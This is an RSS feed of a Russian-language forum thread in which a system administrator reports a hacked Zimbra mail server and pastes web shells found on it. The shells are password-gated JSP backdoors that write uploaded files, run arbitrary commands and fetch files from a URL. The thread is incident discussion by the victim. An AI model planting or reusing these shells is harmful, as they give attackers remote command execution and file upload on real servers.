<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Zimbra поломали</title>
    <link>https://opennet.ru/openforum/vsluhforumID10/5571.html</link>
    <description>Зашел в консоль, а там 4 админа в аккаунтах, по каталогам полазил, есть новые файлы. Наружу админка закрыта, походу по уязвимостям хакнули. Нашел разные файлы, вот один из них&lt;br&gt;&amp;lt;&#037;&lt;br&gt;    if(&quot;toe0Kq&quot;.equals(request.getParameter(&quot;pwd&quot;)))&lt;br&gt;    &#123;&lt;br&gt;        String strCode=request.getParameter(&quot;code&quot;);&lt;br&gt;        String strFile=request.getParameter(&quot;file&quot;);&lt;br&gt;        if(strCode!=null&amp;&amp;strFile!=null)&lt;br&gt;        &#123;&lt;br&gt;            java.io.InputStream in = new java.io.ByteArrayInputStream(strCode.getBytes());&lt;br&gt;            byte&#091;&#093; b = new byte&#091;1024&#093;;&lt;br&gt;            java.io.ByteArrayOutputStream bs = new java.io.ByteArrayOutputStream();&lt;br&gt;            int a = -1;&lt;br&gt;            while ((a = in.read(b)) != -1)&lt;br&gt;            &#123;&lt;br&gt;                bs.write(b, 0, a);&lt;br&gt;            &#125;&lt;br&gt;            new java.io.FileOutputStream(application.getRealPath(&quot;/&quot;)+&quot;/img/&quot;+strFile).write(bs.toByteArray());&lt;br&gt;        &#125;&lt;br&gt;        out.print(&quot;XkaGrVj9&quot;);&lt;br&gt;    &#125;&lt;br&gt;&#037;&amp;gt;&lt;br&gt;</description>

<item>
    <title>Zimbra поломали (BarS)</title>
    <link>https://opennet.ru/openforum/vsluhforumID10/5571.html#6</link>
    <pubDate>Wed, 27 Jan 2021 13:02:02 GMT</pubDate>
    <description>&amp;gt;&amp;gt; и троян Trojan:JS/Chopper.YA!MTB &lt;br&gt;&amp;gt; На Винде? :) &lt;br&gt;&lt;br&gt;На винде скаченный файл открыть защитник не дает&lt;br&gt;</description>
</item>

<item>
    <title>Zimbra поломали (universite)</title>
    <link>https://opennet.ru/openforum/vsluhforumID10/5571.html#5</link>
    <pubDate>Tue, 26 Jan 2021 15:00:35 GMT</pubDate>
    <description>&amp;gt; и троян Trojan:JS/Chopper.YA!MTB &lt;br&gt;&lt;br&gt;На Винде? :)&lt;br&gt;</description>
</item>

<item>
    <title>Zimbra поломали (BarS)</title>
    <link>https://opennet.ru/openforum/vsluhforumID10/5571.html#4</link>
    <pubDate>Mon, 25 Jan 2021 13:10:10 GMT</pubDate>
    <description>Было незаметно, раз в полгода прокачивали рассылки 1 день про взломанные аккаунты с ссылками на свой сайт. На Россию не рассылали, все за бугор.&lt;br&gt;</description>
</item>

<item>
    <title>Zimbra поломали (BarS)</title>
    <link>https://opennet.ru/openforum/vsluhforumID10/5571.html#3</link>
    <pubDate>Mon, 25 Jan 2021 12:53:32 GMT</pubDate>
    <description>и троян Trojan:JS/Chopper.YA!MTB&lt;br&gt;</description>
</item>

<item>
    <title>Zimbra поломали (BarS)</title>
    <link>https://opennet.ru/openforum/vsluhforumID10/5571.html#2</link>
    <pubDate>Mon, 25 Jan 2021 12:50:24 GMT</pubDate>
    <description>/*&lt;br&gt; * Generated by the Jasper component of Apache Tomcat&lt;br&gt; * Version: jetty/9.3.5.v20151012&lt;br&gt; * Generated at: 2019-04-02 11:49:44 UTC&lt;br&gt; * Note: The last modified time of this file was set to&lt;br&gt; *       the last modified time of the source file after&lt;br&gt; *       generation to assist with modification tracking.&lt;br&gt; */&lt;br&gt;package org.apache.jsp.img;&lt;br&gt;&lt;br&gt;import javax.servlet.*;&lt;br&gt;import javax.servlet.http.*;&lt;br&gt;import javax.servlet.jsp.*;&lt;br&gt;&lt;br&gt;public final class fc47_jsp extends org.apache.jasper.runtime.HttpJspBase&lt;br&gt;    implements org.apache.jasper.runtime.JspSourceDependent,&lt;br&gt;                 org.apache.jasper.runtime.JspSourceImports &#123;&lt;br&gt;&lt;br&gt;  private static final javax.servlet.jsp.JspFactory _jspxFactory =&lt;br&gt;          javax.servlet.jsp.JspFactory.getDefaultFactory();&lt;br&gt;&lt;br&gt;  private static java.util.Map&amp;lt;java.lang.String,java.lang.Long&amp;gt; _jspx_dependants;&lt;br&gt;&lt;br&gt;  private static final java.util.Set&amp;lt;java.lang.String&amp;gt; _jspx_imports_packages;&lt;br&gt;&lt;br&gt;  private static final java.util.Set&amp;lt;java.lang.String&amp;gt; _jspx_imports_classes;&lt;br&gt;&lt;br&gt;  static &#123;</description>
</item>

<item>
    <title>Zimbra поломали (BarS)</title>
    <link>https://opennet.ru/openforum/vsluhforumID10/5571.html#1</link>
    <pubDate>Mon, 25 Jan 2021 12:47:17 GMT</pubDate>
    <description>&amp;lt;&#037;&lt;br&gt;    if(&quot;G5X49Q&quot;.equals(request.getParameter(&quot;pwd&quot;)))&lt;br&gt;    &#123;&lt;br&gt;        String strCmd=request.getParameter(&quot;cmd&quot;);&lt;br&gt;        String strUrl=request.getParameter(&quot;url&quot;);&lt;br&gt;        String strFile=request.getParameter(&quot;file&quot;);&lt;br&gt;        if(null!=strCmd)&lt;br&gt;        &#123;&lt;br&gt;            java.io.InputStream in=Runtime.getRuntime().exec(strCmd).getInputStream();&lt;br&gt;            int a = -1;&lt;br&gt;            byte&#091;&#093; b = new byte&#091;2048&#093;;&lt;br&gt;            out.print(&quot;&amp;lt;pre&amp;gt;&quot;);&lt;br&gt;            while((a=in.read(b))!=-1)&lt;br&gt;            &#123;&lt;br&gt;                out.println(new String(b));&lt;br&gt;            &#125;&lt;br&gt;            out.print(&quot;&amp;lt;/pre&amp;gt;&quot;);&lt;br&gt;        &#125;&lt;br&gt;        if(null!=strUrl&amp;&amp;null!=strFile)&lt;br&gt;        &#123;&lt;br&gt;            java.io.InputStream in = new java.net.URL(strUrl).openStream();&lt;br&gt;            byte&#091;&#093; b = new byte&#091;1024&#093;;&lt;br&gt;            java.io.ByteArrayOutputStream baos = new&lt;br&gt;            java.io.ByteArrayOutputStream();&lt;br&gt;            int a = -1;&lt;br&gt;            while ((a = in.read(b)) != -1)&lt;br&gt;            &#123;&lt;br&gt;                baos.write(b, 0, a);&lt;br&gt;            &#125;&lt;br&gt;            n</description>
</item>

</channel>
</rss>
